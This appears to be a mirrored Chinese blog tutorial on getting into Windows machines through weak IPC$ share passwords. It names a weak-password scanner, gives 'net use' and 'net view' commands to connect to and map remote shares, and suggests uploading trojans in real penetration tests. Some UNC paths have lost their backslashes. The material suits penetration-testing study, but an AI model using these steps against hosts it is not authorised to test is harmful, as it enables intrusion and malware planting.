zoukankan      html  css  js  c++  java
  • ipc$漏洞利用实例

    一、什么是IPC$

    IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,

    通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,

    从而实现对远程计算机的访问。

    二、如何发现系统是否存在该漏洞

    本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现IPC$连接是否存在弱口令,例如使用Hscan工具发现弱口令问题

    三、如何利用IPC$漏洞入侵

     1.建立连接

    net use \192.168.*.*ipc$ "密码" /user:"用户名" 

     2.删除链接

    net use \192.168.*.*ipc$ /del

     3.查看目标主机是否存在共享资源

    net view \192.168.*.*

     4.映射远程共享资源到本地,本例中意为将远程主机192.168.*.*的共享资源share映射到本地的z盘

    net use z: \192.168.*.*share 

      查看系统盘符z是否已建立

     5.上传文件至该共享资源中(实际的渗透测试中可上传木马等恶意文件)

     查看是否已经复制成功

    详细命令以及说明请戳这里

  • 相关阅读:
    为公司转型做的一些准备——数据库设计技术
    jdbc多种实现方式
    JNuit
    JDBC初体验
    jsp原理
    jsp登陆
    jsp homework(*)
    集合(5)
    集合(4)
    集合(3)
  • 原文地址:https://www.cnblogs.com/tdcqma/p/5707954.html
Copyright © 2011-2022 走看看